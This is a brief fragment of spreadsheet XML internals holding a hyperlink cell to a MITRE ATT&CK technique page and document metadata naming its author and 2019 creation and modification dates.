    <hyperlink ref="B224" r:id="rId475" display="https://attack.mitre.org/techniques/T1220" xr:uid="{238695F6-0345-6149-9DAE-7DB9E34EB9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Rodriguez</dc:creator>
  <cp:lastModifiedBy>Roberto Rodriguez</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-02T23:22:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-07T08:22:36Z</dcterms:modified>
</cp:coreProperties>
</file>